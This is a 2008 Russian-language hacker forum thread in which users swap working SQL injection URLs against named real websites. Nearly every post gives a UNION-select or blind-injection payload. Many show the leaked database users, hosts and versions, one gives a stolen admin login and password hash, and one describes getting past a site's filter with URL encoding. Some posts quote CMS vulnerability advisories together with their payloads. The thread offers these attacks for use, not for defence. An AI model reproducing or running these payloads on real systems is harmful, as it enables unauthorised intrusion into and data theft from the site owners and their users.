SQL-инъекции

Тема в разделе "Поиск уязвимостей", создана пользователем Constantine, 8 май 2007.

  1. HornetBlack
    HornetBlack Новичок
    Симпатии:
    12
    Код:
    http://www.trikeshop.com/shop_details.php?id=0+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,concat_ws(0x3a,version(),user(),database()),17,18,19,20,21--
    Код:
    http://www.19thcenturyshop.com/apps/catalogitem?id=0+union+select+1,2,3,4,5,6,7,8,9,10,11,12,concat_ws(0x3a,version(),user(),database()),14,15,16,17,18,19,20,21--
     
    22 ноя 2008
    1 человеку нравится это.
  2. faza02
    faza02 Guest
    Код:
    http://www.k9magazine.com/pages.php?pid=7+and+0+union+select+1,convert(user()+using+latin1),3,4/*
    user(): k9_magazine1@64.111.99.240
    database(): k9magazine1
    version(): 4.1.16-standard-log

    сенк ту скай)
     
    22 ноя 2008
  3. HornetBlack
    HornetBlack Новичок
    Симпатии:
    12
    Код:
    http://www.russian.kiev.ua/book.php?id=-1+union+select+1,2,3,concat_ws(0x3a,version(),user(),database()),5,6,7,8,9,10,11--
    Код:
    http://www.sp7gxp.pl/articles.php?topic=0+%75%6E%69%6F%6E+%73%65%6C%65%63%74+1,2,3,4,5,6--
     
    22 ноя 2008
    1 человеку нравится это.
  4. NetSky
    NetSky Guest
    Код:
    http://www.sp7gxp.pl/articles.php?topic=0+%75%6E%69%6F%6E+%73%65%6C%65%63%74+1,2,3,4,5,6--
    Эта типа прикол?! Нах такое выкладывать?!
     
    22 ноя 2008
  5. HornetBlack
    HornetBlack Новичок
    Симпатии:
    12
    Привык, что никто не борется с инжектами? ;) На этом движке многие ляховские сайты слеплены и самые сообразительные из них уже ваяют защиту (даже появился модуль для отслеживания инжектов). Тем интереснее ее обходить...
    l:h SP7GXP:c866a2d4a6fb90054f93d70ab58c33db :)
     
    23 ноя 2008
    1 человеку нравится это.
  6. Ap0str0F
    Ap0str0F Guest
    Переведите кто-нить, а? А то у мну странное ощущение, что тут чёта обидное в мой адрес написано..
    Буду ждать, пошёл пока чай поставлю - надож гостеприимность проявить =)
     
    Последнее редактирование модератором: 23 ноя 2008
    23 ноя 2008
  7. HornetBlack
    HornetBlack Новичок
    Симпатии:
    12
    Грозятся расстрелом через повешенье согласно поляцкого УК. И добавляют, что попытка злобного взлома зарегистрирована, так что ребяты уже выехали... :)

    ЗЫ. А ума фильтровать url-encoded им таки и не хватило...:ha-ha:
     
    23 ноя 2008
  8. Lisunka
    Lisunka Guest
    Vlog System 1.1

    Уязвимость позволяет удаленному пользователю выполнить произвольные SQL команды в базе данных приложения. Уязвимость существует из-за недостаточной обработки входных данных в параметре «user» сценарием blog.php.

    www.Target.com/blog.php?user=<< REAL USER NAME HERE >>&note=906+AND+1=0+UNION+SELECT+1,2,Concat_Ws(0x3a,user(),@@version),4,5,6,7,8--

    Добавлено через 6 минут
    Easyedit CMS

    Уязвимость позволяет удаленному пользователю выполнить произвольные SQL команды в базе данных приложения. Уязвимость существует из-за недостаточной обработки входных данных в параметре "intSubCategoryID" сценарием subcategory.php и в параметре "intPageID" сценариями page.php и news.php

    ww.healthyliving.ie/page.php?intPageID=-1 UNION SELECT concat_ws(0x3a,version(),database(),user())--

    ww.healthyliving.ie/subcategory.php?intSubCategoryID=-1 UNION SELECT concat_ws(0x3a,version(),database(),user())--

    ww.ci3.ie/news.php?intPageID=-1%20UNION%20SELECT%20concat_ws(0x3a,version(),database(),user())--
     
    Последнее редактирование модератором: 24 ноя 2008
    24 ноя 2008
    1 человеку нравится это.
  9. faza02
    faza02 Guest
    Код:
    http://ukrgazeta.plus.org.ua/article.php?ida=-594+union+select+1,2,3,4,5,6,7,8,9,10/*
    user(): u_plus@localhost
    database(): plus
    version(): 4.1.22
     
    24 ноя 2008
    1 человеку нравится это.
  10. Хел
    Хел Guest
    Lisunka,
    чета мне не верится что ты девушка=\
     
    24 ноя 2008
  11. HornetBlack
    HornetBlack Новичок
    Симпатии:
    12
    Еще пара инжектов от братьев-хохлов
    Код:
    http://www.personal.in.ua/article.php?ida=0+union+select+1,2,3,4,5,6,7,concat_ws(0x3a,version(),user(),database()),9,10,11,12,13--
    Код:
    http://www.osnova.com.ua/article.php?artid=0+union+select+1,2,concat_ws(0x3a,version(),user(),database()),4,5,6,7,8,9,10,11,12,13--
    Версии 4.1.2x, админки стандартные, но таблицы админов пока не вычислил.
     
    24 ноя 2008
  12. Lisunka
    Lisunka Guest
    WebStudio CMS

    Уязвимость позволяет удаленному пользователю выполнить произвольные SQL команды в базе данных приложения. Уязвимость существует из-за недостаточной обработки входных данных в параметре «pageid» сценарием index.php

    localhost/index.php?pageid=1+and+1=1 ( TRUE )

    localhost/index.php?pageid=1+and+1=2 ( FALSE )

    localhost/index.php?pageid=1+and+substring(@@version,1,1)=3 ( TRUE )

    localhost/index.php?pageid=1+and+substring(@@version,1,1)=4 ( FALSE )

    localhost/index.php?pageid=1+and+substring(@@version,1,1)=5 ( FALSE )
     
    25 ноя 2008
  13. NetSky
    NetSky Guest
    Я так и не пойму что это такое? И зачем брать откуда-то "уязвимости" и копировать сюда? Тема для найденных тобою скл-инжектов, а здесь ими и не пахнет... Да и примеры ориентированы под мсскл...
     
    25 ноя 2008
  14. Ap0str0F
    Ap0str0F Guest
    Это blind sql-inj, взято походу с какого-нить багтрэка...
    Вот свеженайденный примерчик по этой уязвимости:
    _http://www.worldrowing.com/index.php?pageid=116+and+(select+1+from+mysql.user+limit+0,1)=1
    Версия бд - 5..
     
    Последнее редактирование модератором: 26 ноя 2008
    25 ноя 2008
  15. HornetBlack
    HornetBlack Новичок
    Симпатии:
    12
    4.1.20:cathnet@localhost:catholic_net
    Код:
    http://www.catholic.net/pro-life/template_channel.phtml?channel_id=0'+union+select+1,2,3,concat_ws(0x3a,version(),user(),database()),5,6,7,8,9,10,11/*
    4.1.20:igloomysql@localhost:igloo
    Код:
    http://www.igloomag.com/doc.php?task=view&category=reviews&id=0+union+select+1,2,3,concat_ws(0x3a,version(),user(),database()),5,6,7,8,9,10/*
     
    26 ноя 2008
    1 человеку нравится это.
  16. Ghostix
    Ghostix Guest
    Последнее редактирование модератором: 27 ноя 2008
    27 ноя 2008
    1 человеку нравится это.
  17. faza02
    faza02 Guest
    Код:
    http://www.michaeloddo.com/googlestore/storeit.php?id=19+union+select+1,2,3,4,5,6,7,8,9--
    version(): 4.1.22-standard-log
    user(): magimik_magimike@74.50.88.2
    database(): magimik_shop


    Код:
    http://www.pakwatan.com/business_detail.php?id=-4724+union+select+1,2,3,4,5,6,7,8,9,10--
    version(): 5.0.67-community
    user(): pakweb_ahmad@localhost
    database(): pakweb_pakwatan

    Код:
    http://www.theyorkdirectory.com/business_detail.php?id=4+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29/*


    Код:
    http://springhillchamber.com/business_detail.php?id=-283+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35--
    version(): 5.0.67-community-log
    user(): springh5_5hc0com@localhost
    database(): springh5_5Hchamber
     
    27 ноя 2008
  18. xeran
    xeran Guest
    4.1.22-log
    Код:
    http://oloot.com/buyaccounts.php?gameid=-2+union+select+version(),2,3--
    Сайт специлизируеться по продажам аккаунтов игровых миров)
     
    28 ноя 2008
    2 пользователям это понравилось.
  19. HornetBlack
    HornetBlack Новичок
    Симпатии:
    12
    5.0.67-log
    Код:
    http://www.sokol-mebel.ru/dressers/item.php?id=-1+union+select+1,2,3,4,5,6,concat_ws(0x3a,version(),user(),database()),8,9--
    5.0.67-log
    Код:
    http://www.garo.cc/text.php?pageid=-1+union+select+1,2,3,concat_ws(0x3a,version(),user(),database()),5,6,7,8,9--
     
    29 ноя 2008
  20. faza02
    faza02 Guest
    Код:
    http://www.peopleandplanet.net/section.php?section=-3+union+select+1,2,3,4,5/*
    5.0.27-standard
     
    30 ноя 2008
Загрузка...